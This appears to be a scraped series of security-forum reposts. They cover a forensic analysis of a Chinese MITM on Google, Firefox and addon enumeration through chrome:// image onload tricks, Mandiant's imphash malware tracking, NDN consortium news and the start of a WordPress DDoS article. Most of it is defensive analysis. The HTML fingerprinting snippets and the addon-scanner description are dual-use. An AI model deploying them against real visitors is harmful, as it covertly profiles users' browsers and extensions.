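    for entry in getattr(pe, "DIRECTORY_ENTRY_IMPORT", []):
        dll = entry.dll.decode(errors="replace")
        names = [imp.name.decode(errors="replace")
                 for imp in entry.imports if imp.name]
        print(f"{dll}: {', '.join(names)}")
        # Flag the network-enumeration imports discussed in the article.
        if dll.lower() == "mpr.dll":
            wnet = [n for n in names if n.startswith("WNet")]
            if wnet:
                print(f"  !! WNet* enumeration APIs present: {', '.join(wnet)}")

if __name__ == "__main__":
    dump_imports(sys.argv[1])  # e.g. the sample DLL referenced by its MD5 above
```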
-
Analysis of Chinese MITM on Google

The Chinese are running a MITM attack on SSL encrypted traffic between Chinese universities and Google. We've performed technical analysis of the attack, on request from GreatFire.org, and can confirm that it is a real SSL MITM against Google and that it is being performed from within China.

We were contacted by GreatFire.org two days ago (September 3) with a request to analyze two packet captures from suspected MITM-attacks before they finalized their blog post. The conclusions from our analysis are now published as part of GreatFire.org's great blog post titled “Authorities launch man-in-the-middle attack on Google”. In their blog post GreatFire.org write:

From August 28, 2014 reports appeared on Weibo and Google Plus that users in China trying to access google.com and google.com.hk via CERNET, the country’s education network, were receiving warning messages about invalid SSL certificates. The evidence, which we include later in this post, indicates that this was caused by a man-in-the-middle attack. While the authorities have been blocking access to most things Google since June 4th, they have kept their hands off of CERNET, China’s nationwide education and research network. However, in the lead up to the new school year, the Chinese authorities launched a man-in-the-middle (MITM) attack against Google.

Our network forensic analysis was performed by investigating the following two packet capture files:

[TABLE]
[TR]
[TH]Capture Location[/TH]
[TH]Client Netname[/TH]
[TH]Capture Date[/TH]
[TH]Filename[/TH]
[TH]MD5[/TH]
[/TR]
[TR]
[TD]Peking University[/TD]
[TD]PKU6-CERNET2[/TD]
[TD]Aug 30, 2014[/TD]
[TD]google.com.pcap[/TD]
[TD]aba4b35cb85ed218 7a8a7656cd670a93[/TD]
[/TR]
[TR]
[TD]Chongqing University[/TD]
[TD]CQU6-CERNET2[/TD]
[TD]Sep 1, 2014[/TD]
[TD]google_fake.pcapng[/TD]
[TD]3bf943ea453f9afa 5c06b9c126d79557[/TD]
[/TR]
[/TABLE]

Client and Server IP Addresses

The analyzed capture files contain pure IPv6 traffic (CERNET is an IPv6 network), which made the analysis a bit different than usual. We do not disclose the client IP addresses for privacy reasons, but they both seem legit; one from Peking University (netname PKU6-CERNET2) and the other from Chongqing University (CQU6-CERNET2). Both IP addresses belong to AS23910, named "China Next Generation Internet CERNET2".

Peking University entrance by galaygobi. Licensed under Creative Commons Attribution 2.0
Chongqing University gate by Brooktse. Licensed under Creative Commons Attribution-Share Alike 3.0

The IP addresses received for Google were in both cases also legit, so the MITM wasn't carried out through DNS spoofing. The Peking University client connected to 2607:f8b0:4007:804::1013 (GOOGLE-IPV6 in United States) and the connection from Chongqing University went to 2404:6800:4005:805::1010 (GOOGLE_IPV6_AP-20080930 in Australia).

Time-To-Live (TTL) Analysis

The Time-To-Live (TTL) values received in the IP packets from Google were in both cases 248 or 249 (note: TTL is actually called ”Hop Limit” in IPv6 nomenclature, but we prefer to use the well established term ”TTL” anyway). The highest possible TTL value is 255, which means that the received packets haven't made more than 6 or 7 router hops before ending up at the client. However, the expected number of router hops between a server on GOOGLE-IPV6 and the client at Peking University is around 14. The low number of router hops is a clear indication of an IP MITM taking place.
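If you want to reproduce this TTL/Hop Limit check on your own captures, a few lines of Scapy are enough to list the hop limit of every IPv6 packet coming from a given source (the original analysis used CapLoader, as the screenshot caption that follows notes). The pcap file name and source prefix below are placeholders.

```python
from collections import Counter
from scapy.all import rdpcap, IPv6  # third-party: pip install scapy

def hop_limits(pcap_path, src_prefix):
    """Count observed IPv6 hop limits for packets from a given source prefix."""
    counts = Counter()
    for pkt in rdpcap(pcap_path):
        if IPv6 in pkt and pkt[IPv6].src.startswith(src_prefix):
            counts[pkt[IPv6].hlim] += 1
    return counts

if __name__ == "__main__":
    # Placeholder file name and prefix; use the Google server address seen in
    # the capture (e.g. 2607:f8b0:... for the Peking University trace).
    print(hop_limits("google.com.pcap", "2607:f8b0:"))
```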
CapLoader with both capture files loaded, showing TTL values

Here is an IPv6 traceroute from AS25795 in Los Angeles towards the IP address at Peking University (generated with ARP Networks' 4or6.com tool):

#traceroute -6 2001:da8:201:1374:8ea9:82ff:fe3c:322
1 2607:f2f8:1600::1 (2607:f2f8:1600::1) 1.636 ms 1.573 ms 1.557 ms
2 2001:504:13::1a (2001:504:13::1a) 40.381 ms 40.481 ms 40.565 ms
3 * * *
4 2001:252:0:302::1 (2001:252:0:302::1) 148.409 ms 148.501 ms 148.595 ms
5 * * *
6 2001:252:0:1::1 (2001:252:0:1::1) 148.273 ms 147.620 ms 147.596 ms
7 pku-bj-v6.cernet2.net (2001:da8:1:1b::2) 147.574 ms 147.619 ms 147.420 ms
8 2001:da8:1:50d::2 (2001:da8:1:50d::2) 148.582 ms 148.670 ms 148.979 ms
9 cernet2.net (2001:da8:ac:ffff::2) 147.963 ms 147.956 ms 147.988 ms
10 2001:da8:[REDACTED] 147.964 ms 148.035 ms 147.895 ms
11 2001:da8:[REDACTED] 147.832 ms 147.881 ms 147.836 ms
12 2001:da8:[REDACTED] 147.809 ms 147.707 ms 147.899 ms

As can be seen in the traceroute above, seven hops before the client we find the 2001:252::/32 network, which is called “CNGI International Gateway Network (CNGIIGN)”. This network is actually part of CERNET, but on AS23911, which is the network that connects CERNET with its external peers. A reasonable assumption is therefore that the MITM is carried out on the 2001:252::/32 network, or where AS23910 (2001:da8:1::2) connects to AS23911 (2001:252:0:1::1). This means that the MITM attack is being conducted from within China.

Response Time Analysis

The round-trip time between the client and server can be estimated by measuring the time from when the client sends its initial TCP SYN packet to when it receives a TCP SYN+ACK from the server. The expected round-trip time for connecting from CERNET to a Google server overseas would be around 150ms or more. However, in the captures we've analyzed the TCP SYN+ACK package was received in just 8ms (Peking) and 52ms (Chongqing) respectively. Again, this is a clear indication of an IP MITM taking place, since Google cannot possibly send a response from the US to CERNET within 8ms regardless of how fast they are. The fast response times also indicate that the machine performing the MITM is located fairly close to the network at Peking University.

Even though the machine performing the MITM was very quick at completing the TCP three-way handshake, we noticed that the application layer communication was terribly slow. The specification for the TLS handshake (RFC 2246) defines that a ClientHello message should be responded to with a ServerHello. Google typically sends their ServerHello response almost instantly, i.e. the response is received after one round-trip time (150ms in this case). However, in the analyzed captures we noticed ServerHello response times of around 500ms.

X.509 Certificate Analysis

We extracted the X.509 certificates from the two capture files to .cer files using NetworkMiner. We noticed that both users received identical certificates, which were both self signed for “google.com”. The fact that the MITM used a self signed certificate makes the attack easily detectable even for the non-technical user, since the web browser will typically display a warning about the site not being trusted. Additionally, the X.509 certificate was created for ”google.com” rather than ”*.google.com”. This is an obvious miss on the MITM'ers side, since they were attempting to MITM traffic to ”www.google.com” but not to ”google.com”.
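A quick way to verify that an extracted .cer file matches the certificate discussed here is to hash its raw bytes, since a certificate's SHA1/MD5 fingerprint is simply the digest of its DER encoding (this sketch assumes the exported .cer is DER-encoded; the file name is a placeholder). The output can be compared with the fingerprints listed next.

```python
import hashlib
import sys

def fingerprints(cer_path):
    """Print SHA1 and MD5 fingerprints of a DER-encoded certificate file."""
    der = open(cer_path, "rb").read()
    sha1 = hashlib.sha1(der).hexdigest()
    md5 = hashlib.md5(der).hexdigest()
    print("SHA1:", sha1)
    print("MD5: ", ":".join(md5[i:i + 2].upper() for i in range(0, len(md5), 2)))

if __name__ == "__main__":
    fingerprints(sys.argv[1] if len(sys.argv) > 1 else "google_fake.cer")
```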
NetworkMiner showing list of X.509 certificates extracted from the two PCAP files

Certificate SHA1 fingerprint: f6beadb9bc02e0a152d71c318739cdecfc1c085d
Certificate MD5 fingerprint: 66:D5:D5:6A:E9:28:51:7C:03:53:C5:E1:33:14:A8:3B

A copy of the fake certificate is available on Google drive thanks to GreatFire.org.

Conclusions

All evidence indicates that a MITM attack is being conducted against traffic between China’s nationwide education and research network CERNET and Google. It looks as if the MITM is carried out on a network belonging to AS23911, which is the outer part of CERNET that peers with all external networks. This network is located in China, so we can conclude that the MITM was being done within the country.

It's difficult to say exactly how the MITM attack was carried out, but we can dismiss DNS spoofing as the used method. A more probable method would be IP hijacking; either through a BGP prefix hijacking or some form of packet injection. However, regardless of how they did it, the attacker would be able to decrypt and inspect the traffic going to Google. We can also conclude that the method used to perform the MITM attack was similar to the Chinese MITM on GitHub, but not identical.

Sursa: Analysis of Chinese MITM on Google - NETRESEC Blog
-
Dirty Browser Enumeration Tricks – Using chrome:// and about:
Nytro posted a topic in Securitate web
Dirty Browser Enumeration Tricks – Using chrome:// and about: to Detect Firefox & Plugins

After playing around with some of the cool Firefox Easter eggs I had an interesting thought about the internal chrome:// resources in the Firefox web browser. In a previous post I found that I could access local Firefox resources such as style-sheets, images, and other local content in any public web page. For example, if you’re using the Firefox web browser, you know what the following image is:

For everyone else, the above image is broken. This is because the image is actually a link to “about:logo”. It’s a reference to a local resource only found in Firefox flavored web browsers. When the image is viewed in Chrome, Internet Explorer, or Safari, the reference doesn’t exist and the image link is broken. Alright, how about a consolation prize – what about this image?

That may be cool, but it does beg the question – can we abuse this? Of course we can!

Subverting Same Origin for Browser & Plugin Identification

With a little bit of trickery we can use these local references to:

1. Identify Firefox with 100% accuracy
2. Identify any Firefox plugins with special “chrome.manifest” settings (to be covered below)

This can be done by doing something like the following:

<img src="about:logo" onload="alert('Browser is Firefox!')" />

Simply enough, if you get a JavaScript alert – you’re using Firefox! (Interestingly enough, this doesn’t work on the Tor browser. Perhaps due to the NoScript addon?) The same trick can be used to identify some plugins as well. For example if you are using the “Resurrect Pages” plugin, you can see the following image:

Using the same tactic as above, we can enumerate the install of “Resurrect Pages” via the following:

<img src="chrome://resurrect/skin/cacheicons/google.png" onload="alert('Browser has Resurrect Pages installed!')" />

So, how do we know what plugins this works for? From the Mozilla Developer Network:

“Chrome resources can no longer be referenced from within <img>, <script>, or other elements contained in, or added to, content that was loaded from an untrusted source. This restriction applies to both elements defined by the untrusted source and to elements added by trusted extensions. If such references need to be explicitly allowed, set the contentaccessible flag to yes to obtain the behavior found in older versions of Firefox.”
https://developer.mozilla.org/en-US/docs/Chrome_Registration

To put it short, if the plugin has a line like the following in its “chrome.manifest” file:

content packagename chrome/path/ contentaccessible=yes

Then the plugin’s resources can be included just like any other web resource. Which means if the plugin has any style-sheets, images, or JavaScript – it can be enumerated!
When I was first investigating this behavior I thought I was original, but of course others have attempted this as well:

Firefox add-on detection with Javascript | WebDevWonders.com
Detecting FireFox Extentions ha.ckers.org web application security lab

Oh well, let’s do it on a bigger scale!

Gathering Firefox Addon Analytics

In order to get a comprehensive list of which addons had set this “contentaccessible” flag to “yes”, I scraped ~12K addons from the Firefox Addons website. Each addon XPI was parsed for its “chrome.manifest” file and the “contentaccessible=yes” flag. If the flag existed, the proper chrome URI was generated for each file in the content path. These paths were then used to construct a JavaScript scanner that works by making references to these chrome URIs and checking if they are valid via the “onload” event.

The completed scanner: After taking analytics on all of these addons it was found that only a mere ~400 had the proper contentaccessible flag combined with detectable resources. By detectable resources I mean resources such as JavaScript, CSS, or images that could be embedded and detected. This means that out of all the addons, only about ~3.3% could be detected in this manner.

There are, however, other methods of detecting the presence of Firefox addons. For example, despite the Adblock Plus addon not having a contentaccessible flag, it can be detected by attempting to make a script or image reference to a blocked domain. If the reference fails to load on a file that is perfectly valid, we know it is being blocked by Adblock Plus or some other anti-advertisement addon. In the same manner we could fingerprint which Adblock Plus list is being used.

The detection of addons is quite quick and only takes a few seconds to complete. This is due to the fact that the references are local, so they aren’t being grabbed off a webserver but directly from the browser itself. To try the scanner out in your Firefox browser, see the following link: Firefox Plugin Detector

For other hackers or web developers, a full JSON dump of the data collected is available here (warning, big file!). This contains data on publicly accessible chrome:// URIs as well as basic information on every addon collected. I’d link to the dump of all the Firefox addon XPIs downloaded but it goes well over a gigabyte in size and I’m not sure if re-hosting addons is allowed.

As a final point, being able to access this data has another advantage. If any information is leaked in the JavaScript resources, such as local filesystem references, OS information, etc., this could be included and could potentially leak sensitive information. After checking many of the chrome:// resources inside Firefox itself I found that most references to the browser’s version or other information have been crudely commented out. I assume because someone else has attempted this style of enumeration before. Not to mention, if the content is vulnerable to XSS, you have remote code execution due to the JavaScript running at the same level as a Firefox addon.

Until next time,
-mandatory

Sursa: Dirty Browser Enumeration Tricks - Using chrome:// and about: to Identify Firefox & Plugins | The Hacker Blog
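As a rough sketch of the XPI survey described above, the following Python reads an addon's chrome.manifest straight out of the XPI (which is just a ZIP archive) and prints the packages registered with contentaccessible=yes, from which the chrome:// URIs can be built. File names here are placeholders and the manifest parsing is simplified (real manifests can also pull in sub-manifests).

```python
import sys
import zipfile

def accessible_packages(xpi_path):
    """Yield (package, path) pairs registered with contentaccessible=yes."""
    with zipfile.ZipFile(xpi_path) as xpi:
        if "chrome.manifest" not in xpi.namelist():
            return
        manifest = xpi.read("chrome.manifest").decode(errors="replace")
        for line in manifest.splitlines():
            parts = line.split()
            # Expected form: content <packagename> <chrome/path/> contentaccessible=yes
            if (len(parts) >= 4 and parts[0] == "content"
                    and "contentaccessible=yes" in parts[3:]):
                yield parts[1], parts[2]

if __name__ == "__main__":
    for package, path in accessible_packages(sys.argv[1]):  # e.g. addon.xpi
        print(f"chrome://{package}/content/  (maps to {path})")
```

-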
UCLA, Cisco & more join forces to replace TCP/IP Named Data Networking Consortium makes its debut in LA By Bob Brown Sep 4, 2014 12:05 PM Big name academic and vendor organizations have unveiled a consortium this week that's pushing Named Data Networking (NDN), an emerging Internet architecture designed to better accommodate data and application access in an increasingly mobile world. The Named Data Networking Consortium members, which include universities such as UCLA and China's Tsinghua University as well as vendors such as Cisco and VeriSign, are meeting this week at a two-day workshop at UCLA to discuss NDN's promise for scientific research. Big data, eHealth and climate research are among the application areas on the table. The NDN effort has been backed in large part by the National Science Foundation, which has put more than $13.5 million into it since 2010. Since that time, participating organizations have somewhat quietly been working on new protocols and specifications, including a new packet format, that have been put through their paces in a testbed that spans from the United States to Asia. Their aim is to put forth an Internet architecture that's more secure, able to support more bandwidth and friendlier to app developers. Cryptographic authentication, flow balance and adaptive routing/forwarding are among the key underlying principles. UCLA has been particularly involved in the NDN effort, and the consortium has been organized by researchers from the UCLA Henry Samueli School of Engineering and Applied Science. Interestingly, among those involved is Jeff Burke, Assistant Dean for Technology and Innovation at the UCLA School of Theater, Film and Television, emphasizing the interdisciplinary approach being taken with NDN. Co-leaders of the project are Lixia Zhang, UCLA’s Jonathan B. Postel Chair in Computer Science, and Van Jacobson, an Internet Hall of Famer and adjunct professor at UCLA. NDN has its roots in content-centric networking, a concept that Jacobson started at Xerox PARC. Other participants are in charge of various aspects of the project: Washington University in St. Louis, for instance, is spearheading scalable NDN forwarding technologies and managing the global testbed. It's no surprise to see Cisco getting into NDN early either (it costs $25K for commercial entities to join, though is free for certain academic institutions). David Oran, a Cisco Fellow and VoIP expert, said in a statement that the consortium "will help evolve NDN by establishing a multifaceted community of academics, industry and users. We expect this consortium to be a major help in advancing the design, producing open-source software, and fostering standardization and adoption of the technology.” Sursa: Cisco, UCLA & more launch Named Data Networking Consortium
-
Tracking Malware with Import Hashing
By Mandiant on January 23, 2014

Tracking threat groups over time is an important tool to help defenders hunt for evil on networks and conduct effective incident response. Knowing how certain groups operate makes for an efficient investigation and assists in easily identifying threat actor activity. At Mandiant, we utilize several methods to help identify and correlate threat group activity. A critical piece of our work involves tracking various operational items such as attacker infrastructure and email addresses. In addition, we track the specific backdoors each threat group utilizes – one of the key ways to follow a group’s activities over time. For example, some groups may favor the SOGU backdoor, while others use HOMEUNIX.

One unique way that Mandiant tracks specific threat groups’ backdoors is to track portable executable (PE) imports. Imports are the functions that a piece of software (in this case, the backdoor) calls from other files (typically various DLLs that provide functionality to the Windows operating system). To track these imports, Mandiant creates a hash based on library/API names and their specific order within the executable. We refer to this convention as an “imphash” (for “import hash”). Because of the way a PE’s import table is generated (and therefore how its imphash is calculated), we can use the imphash value to identify related malware samples. We can also use it to search for new, similar samples that the same threat group may have created and used. Though Mandiant has been leveraging this technique for well over a year internally, we aren’t the first to publicly discuss this.

An imphash is a powerful way to identify related malware because the value itself should be relatively unique. This is because the compiler’s linker generates and builds the Import Address Table (IAT) based on the specific order of functions within the source file. Take the following example source code:

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <wininet.h>

#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "wininet.lib")

int makeMutexA()
{
    CreateMutexA(NULL, FALSE, "TestMutex");
    return 0;
}

int makeMutexW()
{
    CreateMutexW(NULL, FALSE, L"TestMutex");
    return 0;
}

int makeUserAgent()
{
    HANDLE hInet = 0, hConn = 0;
    char buf[sizeof(struct hostent)] = {0};
    hInet = InternetOpenA("User-Agent: (Windows; 5.1)", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
    hConn = InternetConnectA(hInet, "www.google.com", 443, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
    WSAAsyncGetHostByName(NULL, 3, "www.yahoo.com", buf, sizeof(struct hostent));
    return 0;
}

int main(int argc, char *argv[])
{
    makeMutexA();
    makeMutexW();
    makeUserAgent();
    return 0;
}

When that source file is compiled, the resulting import table looks as follows:

ws2_32.dll
  ws2_32.dll.WSAAsyncGetHostByName
wininet.dll
  wininet.dll.InternetOpenA
  wininet.dll.InternetConnectA
kernel32.dll
  kernel32.dll.InterlockedIncrement
  kernel32.dll.IsProcessorFeaturePresent
  kernel32.dll.GetStringTypeW
  kernel32.dll.MultiByteToWideChar
  kernel32.dll.LCMapStringW
  kernel32.dll.CreateMutexA
  kernel32.dll.CreateMutexW
  kernel32.dll.GetCommandLineA
  kernel32.dll.HeapSetInformation
  kernel32.dll.TerminateProcess

Imphash: 0c6803c4e922103c4dca5963aad36ddf

We abbreviated the table to save space, but the red/bolded APIs are the ones referenced in the source code. Note the order in which they appear in the table, and compare that to the order in which they appear in the source file.
If an author were to change the order of the functions and/or the order of the API calls in the source code, this would in turn affect the compiled import table. Take the previous example, modified:

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <wininet.h>

#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "wininet.lib")

int makeMutexW()
{
    CreateMutexW(NULL, FALSE, L"TestMutex");
    return 0;
}

int makeMutexA()
{
    CreateMutexA(NULL, FALSE, "TestMutex");
    return 0;
}

int makeUserAgent()
{
    HANDLE hInet = 0, hConn = 0;
    char buf[sizeof(struct hostent)] = {0};
    hConn = InternetConnectA(hInet, "www.google.com", 443, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
    hInet = InternetOpenA("User-Agent: (Windows; 5.1)", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
    WSAAsyncGetHostByName(NULL, 3, "www.yahoo.com", buf, sizeof(struct hostent));
    return 0;
}

int main(int argc, char *argv[])
{
    makeMutexA();
    makeMutexW();
    makeUserAgent();
    return 0;
}

In this example, we have reversed the order of makeMutexW and makeMutexA, and of InternetConnectA and InternetOpenA. (Note that this would be an invalid sequence of API calls, but we use it here to illustrate the point.) Below is the import table generated from this modified source code (again abbreviated); note the changes when compared to the original IAT, above, as well as the different imphash value:

ws2_32.dll
    ws2_32.dll.WSAAsyncGetHostByName
wininet.dll
    wininet.dll.InternetConnectA
    wininet.dll.InternetOpenA
kernel32.dll
    kernel32.dll.InterlockedIncrement
    kernel32.dll.IsProcessorFeaturePresent
    kernel32.dll.GetStringTypeW
    kernel32.dll.MultiByteToWideChar
    kernel32.dll.LCMapStringW
    kernel32.dll.CreateMutexW
    kernel32.dll.CreateMutexA
    kernel32.dll.GetCommandLineA
    kernel32.dll.HeapSetInformation
    kernel32.dll.TerminateProcess

Imphash: b8bb385806b89680e13fc0cf24f4431e

The final example shows how the ordering of included files at compile time will affect the resulting IAT (and thus the resulting imphash value).
We'll expand on our original example by adding files imphash1.c and imphash2.c, to be included with our original source file imphash.c:

-- imphash1.c --

int makeNamedPipeA()
{
    HANDLE ph = CreateNamedPipeA("\\\\.\\pipe\\test_pipe", PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE, 1, 128, 64, 200, NULL);
    return 0;
}

-- imphash2.c --

int makeNamedPipeW()
{
    HANDLE ph2 = CreateNamedPipeW(L"\\\\.\\pipe\\test_pipeW", PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE, 1, 128, 64, 200, NULL);
    return 0;
}

-- imphash.c --

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <wininet.h>
#include "imphash1.h"
#include "imphash2.h"

#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "wininet.lib")

int makeMutexW()
{
    CreateMutexW(NULL, FALSE, L"TestMutex");
    return 0;
}

int makeMutexA()
{
    CreateMutexA(NULL, FALSE, "TestMutex");
    return 0;
}

int makeUserAgent()
{
    HANDLE hInet = 0, hConn = 0;
    char buf[sizeof(struct hostent)] = {0};
    hConn = InternetConnectA(hInet, "www.google.com", 443, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
    hInet = InternetOpenA("User-Agent: (Windows; 5.1)", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
    WSAAsyncGetHostByName(NULL, 3, "www.yahoo.com", buf, sizeof(struct hostent));
    return 0;
}

int main(int argc, char *argv[])
{
    makeMutexA();
    makeMutexW();
    makeUserAgent();
    makeNamedPipeA();
    makeNamedPipeW();
    return 0;
}

Using the following command to build the EXE:

cl imphash.c imphash1.c imphash2.c /W3 /WX /link

The resulting IAT is:

ws2_32.dll
    ws2_32.dll.WSAAsyncGetHostByName
wininet.dll
    wininet.dll.InternetConnectA
    wininet.dll.InternetOpenA
kernel32.dll
    kernel32.dll.TlsFree
    kernel32.dll.IsProcessorFeaturePresent
    kernel32.dll.GetStringTypeW
    kernel32.dll.MultiByteToWideChar
    kernel32.dll.LCMapStringW
    kernel32.dll.CreateMutexW
    kernel32.dll.CreateMutexA
    kernel32.dll.CreateNamedPipeA
    kernel32.dll.CreateNamedPipeW
    kernel32.dll.GetCommandLineA
    kernel32.dll.HeapSetInformation
    kernel32.dll.TerminateProcess

Imphash: 9129bdbc18cfd1aba498c94e809567d5

Changing the order of includes for imphash1.h and imphash2.h within the source file imphash.c will have no effect on the ordering of the IAT. However, changing the order of the files on the command line and recompiling will affect the IAT; note the re-ordering of CreateNamedPipeW and CreateNamedPipeA:

cl imphash.c imphash2.c imphash1.c /W3 /WX /link

ws2_32.dll
    ws2_32.dll.WSAAsyncGetHostByName
wininet.dll
    wininet.dll.InternetConnectA
    wininet.dll.InternetOpenA
kernel32.dll
    kernel32.dll.TlsFree
    kernel32.dll.IsProcessorFeaturePresent
    kernel32.dll.GetStringTypeW
    kernel32.dll.MultiByteToWideChar
    kernel32.dll.LCMapStringW
    kernel32.dll.CreateMutexW
    kernel32.dll.CreateMutexA
    kernel32.dll.CreateNamedPipeW
    kernel32.dll.CreateNamedPipeA
    kernel32.dll.GetCommandLineA
    kernel32.dll.HeapSetInformation
    kernel32.dll.TerminateProcess

Imphash: c259e28326b63577c31ee2c01b25d3fa

These examples show that both the ordering of functions within the original source code – as well as the ordering of source files at compile time – will affect the resulting IAT, and therefore the resulting imphash value. Because source code is rarely organized in exactly the same way, two different binaries with exactly the same imports are highly likely to have different import hashes. Conversely, if two files have the same imphash value, they have the same IAT, which implies that the files were compiled from the same source code, and in the same manner.
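To see the same order dependence outside of C, here is a small Python sketch; it is an editor's illustration, not part of the original Mandiant post. It hashes two abbreviated import orderings (mirroring the first two examples above) as an ordered, comma-joined list of dll.function strings run through MD5; the exact normalization pefile applies is described a little further down. The digests will not match the article's imphash values, which were computed over the full import tables, but the point is the same: identical imports in a different order yield a different hash.

import hashlib

def hash_import_order(imports):
    # Lowercase each "dll.function" entry and MD5 the comma-joined list.
    # (pefile's real convention also strips the ".dll" extension and resolves
    # ordinals; we keep the extension here for readability.)
    normalized = [entry.lower() for entry in imports]
    return hashlib.md5(",".join(normalized).encode()).hexdigest()

original_order = [
    "ws2_32.dll.WSAAsyncGetHostByName",
    "wininet.dll.InternetOpenA",
    "wininet.dll.InternetConnectA",
    "kernel32.dll.CreateMutexA",
    "kernel32.dll.CreateMutexW",
]

# Same imports, but with the wininet and mutex pairs swapped,
# mirroring the second C example above.
reordered = [
    "ws2_32.dll.WSAAsyncGetHostByName",
    "wininet.dll.InternetConnectA",
    "wininet.dll.InternetOpenA",
    "kernel32.dll.CreateMutexW",
    "kernel32.dll.CreateMutexA",
]

print(hash_import_order(original_order))  # one digest
print(hash_import_order(reordered))       # a different digest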
For packed samples and simple tools or utilities (with few imports and, based on their simplicity, likely compiled in the same way), the imphash value may not be unique enough to be useful for attribution. In other words, it may be possible for two different threat actors to independently generate tools with the same imphash based on those factors. However, for more complex and/or custom tools (like backdoors), where a sufficient number of imports is present, the imphash should be relatively unique, and can therefore be used to identify code families that are structurally similar. While files with the same imphash are not guaranteed to originate from the same threat group (it's possible, for example, that the files were generated by a common builder that is shared among groups), the files can at least be reasonably assumed to have a common origin and may eventually be attributable to a single threat group with additional corroborating information. Employing this method has given us great success in verifying attacker backdoors over a period of time and in demonstrating relationships between backdoors and their associated threat groups.

Mandiant has submitted a patch that enables the calculation of the imphash value for a given PE to Ero Carrera's pefile (pefile - pefile is a Python module to read and work with PE (Portable Executable) files - Google Project Hosting). Example code:

import sys
import pefile

pe = pefile.PE(sys.argv[1])
print("Import Hash: %s" % pe.get_imphash())

Mandiant uses an imphash convention that requires that the ordinals for a given import be mapped to a specific function. We've added to pefile a lookup for a couple of DLLs whose exported functions are commonly imported by ordinal.

Mandiant's imphash convention requires the following:

1. Resolving ordinals to function names when they appear
2. Converting both DLL names and function names to all lowercase
3. Removing the file extensions from imported module names
4. Building and storing the lowercased string dllname.functionname in an ordered list
5. Generating the MD5 hash of the ordered list

This convention is implemented in pefile.py version 1.2.10-139 starting at line 3618.

If imphash values serve as relatively unique identifiers for malware families (and potentially for specific threat groups), won't discussing this technique alert attackers and cause them to change their methods? Attackers would need to modify source code (in a way that did not affect the functionality of the malware itself) or change the file order at compile time (assuming the source code is spread across multiple files). While attackers could write tools to modify the imphash, we don't expect many attackers to care enough to do this.

We believe it is important to add imphash to the lexicon as a way to discuss malware samples at a higher level and to exchange information about attackers and threat groups. For example, incident responders can use imphash values to discuss malware without specifically disclosing which exact sample (specific MD5) is being discussed. Consider a scenario where an attacker compiles 30 variants of its backdoor with different C2 locations and campaign IDs and deploys them to various companies. If a blog post comes out stating that a specific MD5 was identified as part of a campaign, then based on that MD5 the attacker immediately knows what infrastructure (such as C2 domains or associated IP addresses) is at stake and which campaign may be in jeopardy.
However, if the malware was identified just by its imphash value, it is possible that the imphash is shared across all 30 of the attacker's variants. The malware is still identifiable by, and can be discussed within, the security community, but the attacker doesn't know which specific samples have been identified or which parts of their infrastructure are in jeopardy.

To demonstrate the effectiveness of this analysis method, we've decided to share the imphash values of a few malware families from the Mandiant APT1 report:

Family Name    Import Hash                         Total Imports   Matched Samples
GREENCAT       2c26ec4a570a502ed3e8484295581989    74              23
GREENCAT       b722c33458882a1ab65a13e99efe357e    74              18
GREENCAT       2d24325daea16e770eb82fa6774d70f1    113             13
GREENCAT       0d72b49ed68430225595cc1efb43ced9    100             13
STARSYPOUND    959711e93a68941639fd8b7fba3ca28f    62              31
COOKIEBAG      4cec0085b43f40b4743dc218c585f2ec    79              10
NEWSREELS      3b10d6b16f135c366fc8e88cba49bc6c    77              41
NEWSREELS      4f0aca83dfe82b02bbecce448ce8be00    80              10
TABMSGSQL      ee22b62aa3a63b7c17316d219d555891    102             9
WEBC2          a1a42f57ff30983efda08b68fedd3cfc    63              25
WEBC2          7276a74b59de5761801b35c672c9ccb4    52              13

We calculated the above malware families and corresponding imphash values over the set of malware from the Mandiant APT1 report released in February 2013. Using the imphash method described above, we calculated imphash values over all the samples, and then counted the total number of samples that matched on each imphash. Using 356 total samples from the report, we were able to identify 11 imphash values that provided significant coverage of their respective families. Pivoting from these imphash values, we were able to identify additional malware samples that further analysis showed were part of the same malware families and attributable to the same threat group.

Imphash analysis, like any other method, has its limitations and should not be considered a single point of success. Just because two binaries have the same imphash value does not mean they belong to the same threat group, or even that they are part of the same malware family (though there is an increased likelihood that this is the case). Imphash analysis is a low-cost, efficient and valuable way to triage potential malware samples and expand discovery by identifying "interesting" samples that merit further analysis. The imphash value gives analysts another pivot point when conducting discovery on threat groups and their tools. Employing this method can also yield results in tracking and verifying attacker backdoors over time, and it can assist in exposing relationships between backdoors and threat groups.

Happy Hunting!

Sursa: https://www.mandiant.com/blog/tracking-malware-import-hashing/
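The post's idea of pivoting on an imphash instead of a single MD5 is easy to put into practice with the pefile support described above. The sketch below is an editor's illustration, not Mandiant's code: it walks a directory of suspected samples (whatever path you pass on the command line) and buckets them by the value pefile's get_imphash() returns.

import os
import sys
from collections import defaultdict

import pefile

def group_by_imphash(sample_dir):
    """Walk a directory of suspected PE files and bucket them by imphash."""
    groups = defaultdict(list)
    for root, _dirs, files in os.walk(sample_dir):
        for name in files:
            path = os.path.join(root, name)
            try:
                pe = pefile.PE(path)
            except pefile.PEFormatError:
                continue  # not a PE file, skip it
            imphash = pe.get_imphash()
            if imphash:  # empty string means no import table was found
                groups[imphash].append(path)
    return groups

if __name__ == "__main__":
    for value, paths in group_by_imphash(sys.argv[1]).items():
        if len(paths) > 1:  # the clusters are the interesting part
            print("%s (%d samples)" % (value, len(paths)))
            for p in paths:
                print("    " + p)

Buckets containing more than one file are candidates for the family-level pivoting shown in the table above, with the caveats about packed samples and trivially simple tools already noted.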
-
Security issues in WordPress XML-RPC: DDoS Explained
G_Victor | September 4, 2014

A number of months ago, a DDoS attack against a website used functionality present in all WordPress sites since 2005 as an amplification vector. According to one report, more than 162,000 WordPress sites sent requests to the target.

What is this DDoS?
